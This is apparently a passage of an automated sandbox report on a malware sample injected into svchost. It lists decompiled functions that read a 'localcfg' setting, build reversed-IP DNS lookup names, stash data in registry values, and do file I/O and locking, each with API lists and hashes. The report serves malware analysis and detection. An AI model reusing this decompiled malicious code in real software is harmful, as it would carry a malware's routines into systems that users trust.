                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 3857584221-0
                                                                                • Opcode ID: 5319953dee484c496063d841a7c49ec8e046ac815c098fb275e65f1af9080c30
                                                                                • Instruction ID: 1dc375ffc274aaa3c382f337e57d8990ac1c4fe44849c605f7afc313438c7926
                                                                                • Opcode Fuzzy Hash: 5319953dee484c496063d841a7c49ec8e046ac815c098fb275e65f1af9080c30
                                                                                • Instruction Fuzzy Hash: 750152F69001187BDB21A7619D89EDF77BCDB99701F000091B749E2050D7B09AD5CF70
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122419 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00122419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}









                                                                                0x00122429
                                                                                0x0012242b
                                                                                0x0012242e
                                                                                0x00122434
                                                                                0x00122436
                                                                                0x0012243b
                                                                                0x00122474
                                                                                0x00122474
                                                                                0x0012243d
                                                                                0x0012243d
                                                                                0x00122440
                                                                                0x00122442
                                                                                0x00122446
                                                                                0x0012244c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012246b
                                                                                0x00122472
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122472
                                                                                0x0012247b
                                                                                0x0012247b
                                                                                0x00122476
                                                                                0x0012247a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001), ref: 00122429
                                                                                • lstrlenA.KERNEL32(?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001,00121E3D,00000001,localcfg,lid_file_upd), ref: 0012243E
                                                                                • lstrcmpiA.KERNEL32(?,?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001,00121E3D,00000001,localcfg), ref: 00122452
                                                                                • lstrlenA.KERNEL32(?,?,00122491,?,?,?,0012E844,-00000030,?,?,?,00000001,00121E3D,00000001,localcfg,lid_file_upd), ref: 00122467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcmpi
                                                                                • String ID: localcfg
                                                                                • API String ID: 1808961391-1857712256
                                                                                • Opcode ID: 9458cf7a3a9e2c6ccdb99c689ed3bbcb8ba7ff363582eebd3f6de517420d27a0
                                                                                • Instruction ID: 4f4befc00c53ecca67b6fd0483166249137a1dedde3f6e3a74ed41e80a92afb4
                                                                                • Opcode Fuzzy Hash: 9458cf7a3a9e2c6ccdb99c689ed3bbcb8ba7ff363582eebd3f6de517420d27a0
                                                                                • Instruction Fuzzy Hash: DE01DA31600268FFCF15EF69DC849DE7BA9EF44394B51C525F95997211E330EA508A90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121C5F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00121C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0012ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0012EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00122684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0012EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00122684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0012ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}















                                                                                0x00121c60
                                                                                0x00121c64
                                                                                0x00121c6a
                                                                                0x00121c71
                                                                                0x00121c74
                                                                                0x00121c86
                                                                                0x00121c8c
                                                                                0x00121d1c
                                                                                0x00121d1c
                                                                                0x00121d1e
                                                                                0x00121d1e
                                                                                0x00121d21
                                                                                0x00121d21
                                                                                0x00121d23
                                                                                0x00121d24
                                                                                0x00121d2a
                                                                                0x00121d2e
                                                                                0x00121d30
                                                                                0x00121d30
                                                                                0x00121d33
                                                                                0x00121d33
                                                                                0x00121d35
                                                                                0x00121d36
                                                                                0x00121d42
                                                                                0x00121d6b
                                                                                0x00121d7e
                                                                                0x00121d88
                                                                                0x00121d88
                                                                                0x00121d8b
                                                                                0x00121d95
                                                                                0x00121d95
                                                                                0x00121c96
                                                                                0x00121c9d
                                                                                0x00121ca4
                                                                                0x00121cab
                                                                                0x00121cae
                                                                                0x00121cb3
                                                                                0x00121cbd
                                                                                0x00121cd2
                                                                                0x00121cd2
                                                                                0x00121ce1
                                                                                0x00121cea
                                                                                0x00121cef
                                                                                0x00121cf4
                                                                                0x00121cfe
                                                                                0x00121cfe
                                                                                0x00121d04
                                                                                0x00121d0a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121d14
                                                                                0x00121d1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121d1a
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                • API String ID: 2111968516-120809033
                                                                                • Opcode ID: 327553396a0d29ceee4e0d22a72e92fb71db9a7f5109abdcb64baacae33f16e3
                                                                                • Instruction ID: dc3b21c720520e395ef3b9fd9679d1e314ba975e4d23364b6833a8d8de5d1bf6
                                                                                • Opcode Fuzzy Hash: 327553396a0d29ceee4e0d22a72e92fb71db9a7f5109abdcb64baacae33f16e3
                                                                                • Instruction Fuzzy Hash: 9A417C729042ACAFDB21DFB8AD54AEE3BE89F59310F240056FDA4D3152D735DA05CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012E654 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0012DD05();
				_t41 = 0x1320e8;
				_t55 =  *0x1320e8 - 0x1320e8; // 0x61f0a8
				if(_t55 == 0) {
					L9:
					_t53 = E0012EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00123E8F(0x1320e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x1320e4;
						__eflags =  *0x1320e4 - _t42; // 0x610f68
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0012DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t21 = _t51 + 0x10; // 0x1320f8
								_t34 = lstrcmpA(_t21, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x1320e4;
						} while ( *_t42 != 0x1320e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x74cb43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x1320e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}















                                                                                0x0012e65a
                                                                                0x0012e664
                                                                                0x0012e666
                                                                                0x0012e66c
                                                                                0x0012e6a9
                                                                                0x0012e6b0
                                                                                0x0012e6b5
                                                                                0x0012e6c8
                                                                                0x0012e6d0
                                                                                0x0012e6d3
                                                                                0x0012e6d8
                                                                                0x0012e6de
                                                                                0x0012e6f5
                                                                                0x0012e6e0
                                                                                0x0012e6e5
                                                                                0x0012e6e9
                                                                                0x0012e6ef
                                                                                0x0012e6ef
                                                                                0x0012e6f9
                                                                                0x0012e6f9
                                                                                0x0012e6fe
                                                                                0x0012e704
                                                                                0x0012e741
                                                                                0x0012e743
                                                                                0x0012e6b9
                                                                                0x0012e6b9
                                                                                0x0012e6c4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e706
                                                                                0x0012e706
                                                                                0x0012e706
                                                                                0x0012e709
                                                                                0x0012e70b
                                                                                0x0012e70e
                                                                                0x0012e715
                                                                                0x0012e715
                                                                                0x0012e715
                                                                                0x0012e718
                                                                                0x0012e71b
                                                                                0x0012e72c
                                                                                0x0012e72c
                                                                                0x0012e72c
                                                                                0x0012e732
                                                                                0x00000000
                                                                                0x0012e736
                                                                                0x0012e71e
                                                                                0x0012e722
                                                                                0x0012e728
                                                                                0x0012e72a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e72a
                                                                                0x0012e710
                                                                                0x0012e713
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e737
                                                                                0x0012e737
                                                                                0x0012e739
                                                                                0x0012e739
                                                                                0x00000000
                                                                                0x0012e706
                                                                                0x0012e6b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e66e
                                                                                0x0012e66e
                                                                                0x0012e66e
                                                                                0x0012e676
                                                                                0x0012e684
                                                                                0x0012e68f
                                                                                0x0012e699
                                                                                0x0012e686
                                                                                0x0012e686
                                                                                0x0012e686
                                                                                0x0012e69b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e69b
                                                                                0x0012e69d
                                                                                0x0012e69d
                                                                                0x0012e69f
                                                                                0x0012e6a1
                                                                                0x0012e6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0012DD05: GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                  • Part of subcall function 0012DD05: InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                  • Part of subcall function 0012DD05: GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                • lstrcmpA.KERNEL32(74CB43E8,00000000,?,74CB43E0,00000000,?,00125EC1), ref: 0012E693
                                                                                • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,74CB43E0,00000000,?,00125EC1), ref: 0012E6E9
                                                                                • lstrcmpA.KERNEL32(89ABCDEF,00000008,?,74CB43E0,00000000,?,00125EC1), ref: 0012E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                • String ID: 89ABCDEF
                                                                                • API String ID: 3343386518-71641322
                                                                                • Opcode ID: c2d3995a4d4187ebc39b1b0c10a03a2cecc668ade1f8a8302c80bafee5cf5750
                                                                                • Instruction ID: 1994f91a5be9842ffaf554d00e94ce21feb3db0daf7ede1c542b2025e7279e02
                                                                                • Opcode Fuzzy Hash: c2d3995a4d4187ebc39b1b0c10a03a2cecc668ade1f8a8302c80bafee5cf5750
                                                                                • Instruction Fuzzy Hash: 4831CD31600B26DFCB35DF64F884BA677E4EB25320F10442AF45A87590E770ECA4CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012E095 Relevance: 6.1, APIs: 4, Instructions: 92registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0012EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0012F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0012F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}
















                                                                                0x0012e09c
                                                                                0x0012e0ba
                                                                                0x00000000
                                                                                0x0012e172
                                                                                0x0012e0c3
                                                                                0x0012e0c6
                                                                                0x0012e0c9
                                                                                0x0012e0cc
                                                                                0x0012e0cc
                                                                                0x0012e0ce
                                                                                0x0012e0cf
                                                                                0x0012e0d7
                                                                                0x0012e0d9
                                                                                0x0012e0df
                                                                                0x0012e0e3
                                                                                0x0012e0e3
                                                                                0x0012e0ec
                                                                                0x0012e0f1
                                                                                0x0012e0f4
                                                                                0x0012e0f9
                                                                                0x0012e13f
                                                                                0x0012e149
                                                                                0x0012e158
                                                                                0x0012e161
                                                                                0x00000000
                                                                                0x0012e0fb
                                                                                0x0012e0fb
                                                                                0x0012e0fb
                                                                                0x0012e102
                                                                                0x0012e104
                                                                                0x0012e104
                                                                                0x0012e110
                                                                                0x0012e115
                                                                                0x0012e12f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e131
                                                                                0x0012e134
                                                                                0x0012e136
                                                                                0x0012e13b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e13b
                                                                                0x0012e13d
                                                                                0x00000000
                                                                                0x0012e13d

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0012E2A3,00000000,00000000,00000000,00020106,00000000,0012E2A3,00000000,000000E4), ref: 0012E0B2
                                                                                • RegSetValueExA.ADVAPI32(0012E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,001322F8), ref: 0012E127
                                                                                • RegDeleteValueA.ADVAPI32(0012E2A3,?,?,?,?,?,000000C8,001322F8), ref: 0012E158
                                                                                • RegCloseKey.ADVAPI32(0012E2A3,?,?,?,?,000000C8,001322F8,?,?,?,?,?,?,?,?,0012E2A3), ref: 0012E161
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID:
                                                                                • API String ID: 2667537340-0
                                                                                • Opcode ID: 935502e51b859c4d37aafd650684d6ee8f6113dd8464ab4eb011d4da9fc18bd5
                                                                                • Instruction ID: b320e2dba82a4b210a458cc5572c4873b56c6abd0911966ad24ee9318827a445
                                                                                • Opcode Fuzzy Hash: 935502e51b859c4d37aafd650684d6ee8f6113dd8464ab4eb011d4da9fc18bd5
                                                                                • Instruction Fuzzy Hash: FA216F71A00229BBDF219FA4EC89EDE7FB9EF09790F004071F904E6151E7718A65DB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00123F18 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00123F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                0x00123f1e
                                                                                0x00123f22
                                                                                0x00123f27
                                                                                0x00123f2b
                                                                                0x00123f2e
                                                                                0x00123f3e
                                                                                0x00123f4c
                                                                                0x00123f7c
                                                                                0x00123f7f
                                                                                0x00123f86
                                                                                0x00000000
                                                                                0x00123f86
                                                                                0x00000000
                                                                                0x00123f83
                                                                                0x00123f59
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00123f5f
                                                                                0x00123f7a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,0012A3C7,00000000,00000000,000007D0,00000001), ref: 00123F44
                                                                                • GetLastError.KERNEL32 ref: 00123F4E
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00123F5F
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00123F72
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 7a1557918111561d08bdd3bda1021a66b84e0ab1c7b16881292a894bb6166e2d
                                                                                • Instruction ID: 33fb5572028a8a11a5672fe3bd2280d9b535576790d1414823324f5e4c2cd9e6
                                                                                • Opcode Fuzzy Hash: 7a1557918111561d08bdd3bda1021a66b84e0ab1c7b16881292a894bb6166e2d
                                                                                • Instruction Fuzzy Hash: A8010C72911219ABDF06DF90EE84BEF7BBCEB08355F104015FA11E6050D734DA648BB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00123F8C Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00123F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                0x00123f92
                                                                                0x00123f96
                                                                                0x00123f9b
                                                                                0x00123f9f
                                                                                0x00123fa2
                                                                                0x00123fb2
                                                                                0x00123fc0
                                                                                0x00123ff0
                                                                                0x00123ff3
                                                                                0x00123ffa
                                                                                0x00000000
                                                                                0x00123ffa
                                                                                0x00000000
                                                                                0x00123ff7
                                                                                0x00123fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00123fd3
                                                                                0x00123fee
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,0012A3C7,00000000,00000000,000007D0,00000001), ref: 00123FB8
                                                                                • GetLastError.KERNEL32 ref: 00123FC2
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00123FD3
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00123FE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 1c4d00930c3a6365c898a941c4bd518966762d8ad10029d391411f676bc204ad
                                                                                • Instruction ID: 2d3f2b71b855c61dd8f79a3aa0a338e38d89f9f90f0eba0c8e69497aba35d6b3
                                                                                • Opcode Fuzzy Hash: 1c4d00930c3a6365c898a941c4bd518966762d8ad10029d391411f676bc204ad
                                                                                • Instruction Fuzzy Hash: D001297291021AABDF01DF90EE85BEE3BBCEB08355F004011F902E2090D734DA648BB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00124E92 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00124E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                0x00124e9c
                                                                                0x00124ea6
                                                                                0x00124ea8
                                                                                0x00124ec0
                                                                                0x00124ec3
                                                                                0x00124ec7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124eaf
                                                                                0x00124eb6
                                                                                0x00124eba
                                                                                0x00000000
                                                                                0x00124eba
                                                                                0x00000000
                                                                                0x00124eb6
                                                                                0x00124ecd

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00124E9E
                                                                                • GetTickCount.KERNEL32 ref: 00124EAD
                                                                                • Sleep.KERNEL32(0000000A,?,00000001), ref: 00124EBA
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00124EC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 85fd910cd69b741f69aa8aced8bf1e4e9250ca72b900a595d47e54783b26d4db
                                                                                • Instruction ID: 5c938f4610270d3b1dab19d046c77267da84d03ef9896388130580eba4cf6392
                                                                                • Opcode Fuzzy Hash: 85fd910cd69b741f69aa8aced8bf1e4e9250ca72b900a595d47e54783b26d4db
                                                                                • Instruction Fuzzy Hash: C3E0863220122457E61427B9FD84F6A6689AB593A1F020531F609D2550C75AD89246B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012A4C7 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}






                                                                                0x0012a4dd
                                                                                0x0012a4df
                                                                                0x0012a4f7
                                                                                0x0012a4fa
                                                                                0x0012a4fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a4e6
                                                                                0x0012a4ed
                                                                                0x0012a4f1
                                                                                0x00000000
                                                                                0x0012a4f1
                                                                                0x00000000
                                                                                0x0012a4ed
                                                                                0x0012a504

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0012A4D1
